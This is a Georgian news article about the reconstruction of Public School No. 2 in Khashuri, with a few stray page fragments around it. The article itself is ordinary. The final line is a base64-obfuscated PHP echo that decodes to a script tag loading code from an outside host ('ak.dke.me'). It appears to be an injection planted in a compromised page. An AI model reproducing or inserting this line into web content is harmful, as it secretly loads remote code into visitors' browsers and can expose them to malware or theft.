celsiusi
ავერსი შნაიდერი

მაღალი ტემპით მიმდინარეობს ხაშურის მე-2 საჯარო სკოლის რეაბილიტაცია- რეკონსტრუქციის პროექტი. სკოლას დაემატა ახალი ფლიგელი და დასკვნით ფაზაშია ყველა ინფრასტრუქტურული, საინჟინრო-ტექნიკური, წყალმომარაგება-წყალარინებისა და ელექტრომომარაგების სამშენებლო სამუშაოები, - ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ ქალაქ ხაშურში საჯარო სკოლის სამშენებლო სამუშაოების დათვალიერების შემდეგ განაცხადა.

რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს ინფორმაციით, ქალაქ ხაშურის, დავით კაკიაშვილის სახელობის №2 საჯარო სკოლა 440 მოსწავლეზეა გათვლილი.

„საჯარო სკოლა საერთაშორისო სტანდარტების შესაბამისად რეაბილიტირდება და ის სრულად იქნება ადაპტირებული შეზღუდული შესაძლებლობის მქონე პირებისთვის. პროექტის მიხედვით მოეწყობა საკლასო ოთახები, საპირფარეშოები, სპორტული მოედნები და ეზოს ტერიტორია. ასევე, დამონტაჟდება გათბობის, წყალმომარაგებისა და კანალიზაციის სისტემები. რეაბილიტაციისა ჩატარდება ენერგოეფექტურობის საჭირო სამუშაოებიც. უკვე დასრულდა სახურავისა და კედლების დათბუნება, რაც უზრუნველყოფს ზამთრის პერიოდში ელექტრო ენერგიის დაზოგვას და სითბოს შენარჩუნებას.

აღსანიშნავია, რომ დავით კაკიაშვილის სახელობის საჯარო სკოლა 1927 წელს, ხოლო მისი ერთი ფლიგელი 1970 წელს აშენდა. მას შემდეგ სკოლას რეაბილიტაცია არ ჩატარებია. შენობა იყო ავარიულ მდგომარეობაში და საჭიროებდა გადაუდებელ რეაბილიტაციას.

№2 საჯარო სკოლის რეაბილიტაცია-მშენებლობა ხორციელდება მსოფლიო ბანკისგან მიღებული სესხისა და სახელმწიფო ბიუჯეტის თანადაფინანსებით, რომლის ფარგლებშიც 37 სკოლის მშენებლობა-რეაბილიტაციაა გათვალისწინებული. სამშენებლო სამუშაოები წლის ბოლოს დასრულდება.

პროექტის დასრულების შემდეგ, სკოლის მოსწავლეები თანამედროვე სტანდარტების მქონე შენობაში ისწავლიან“, - აღნიშნულია ინფორმაციაში.

85
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");